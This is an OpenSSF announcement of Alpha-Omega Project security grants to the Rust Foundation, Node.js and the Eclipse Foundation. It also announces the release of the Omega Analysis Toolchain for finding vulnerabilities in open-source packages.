By Michael Scovetta (Microsoft) and Michael Winser (Google)
As part of the OpenSSF’s continued investment in critical open-source projects, we are happy to announce new partnerships and tooling from the Alpha-Omega Project. Alpha-Omega will sponsor critical security work with a $460K grant to the Rust Foundation. This work expands on funding previously announced at OpenSSF Day in Austin earlier this year for the Python Software Foundation (PSF) and Eclipse Foundation, and for Node.js announced in April, bringing our total investment this year to over $1.5M. The Alpha-Omega team also recently released the initial version of the Omega Analysis Toolchain, which orchestrates over 20 different security analyzers to identify critical security vulnerabilities in open source packages.
New Rust Foundation Partnership
The Alpha-Omega team has reached an agreement with the Rust Foundation to sponsor critical security work with a $460K grant. The Rust Foundation is a nonprofit organization dedicated to supporting and sustaining the Rust programming language. These funds will be used to:
- Prepare a threat model of the Rust ecosystem.
- Assess the security of the Rust build/deployment infrastructure, and drive relevant improvements.
- Improve the security of Rust.
“The Rust Foundation is delighted to receive the support of OpenSSF and the Alpha-Omega Project to support its new Security Team,” says Bec Rumbul, Executive Director at the Rust Foundation. “This funding is kick-starting vital proactive work in the Rust ecosystem that will ensure that Rust continues to be a secure, safe and sustainable language for everyone.”
Node.js and Eclipse Foundation Partnership Updates
The open source software project Node.js is everywhere, and people put a lot of trust into the products and services that are built with Node.js A $300K grant for Node.js is measured so far by the below achievements:
- Improved Node security release process.
- Triaged over 20 vulnerability reports and issues security fixes.
- Reactivated the Node security working group by creating a security and threat model for Node.js; experimental permissions model for Node modules and adding automated vulnerability to the Node.js CI.
The Eclipse Foundation provides its global community of individuals and organizations with a mature, scalable, and business-friendly environment for open source software collaboration and innovation. A $400K grant for Eclipse is measured by below achievements:
- Ran Scorecard against all Eclipse Foundation projects and analyzed the results.
- Identified dangerous workflows in a small number of repositories (fixes underway).
Plans are in progress to improve organization token permissions to read-only or help projects configure them, configure Dependabot or renovate in their repositories, enable tag protection for most repositories and enable static analysis (CodeQL, SonarCloud or Sonatype Lift).
Releasing the Omega Analysis Toolkit
The Alpha-Omega team recently released the initial version of the Omega Analysis Toolchain, which orchestrates over 27 different security analyzers to identify critical security vulnerabilities in open source packages. Contributed to OpenSSF by Microsoft, this toolchain has been used to identify the vulnerabilities described in CVE-2022-32222 and CVE-2022-38018, and will be expanded and improved upon in the future. We’ve also used this toolchain to experiment with a “fully automated security review,” in collaboration with the OpenSSF Security Reviews project.
The Alpha-Omega Project is pleased to be able to build partnerships and support the work of many important open source security initiatives. The contributions and support of the developer community and member companies is what makes OpenSSF such a success. Learn more about how you can join your industry peers in supporting OpenSSF by filling out this form and an OpenSSF representative will be in touch with you. Individual contributors are also encouraged to join our efforts. See the many ways you can get involved in the OpenSSF.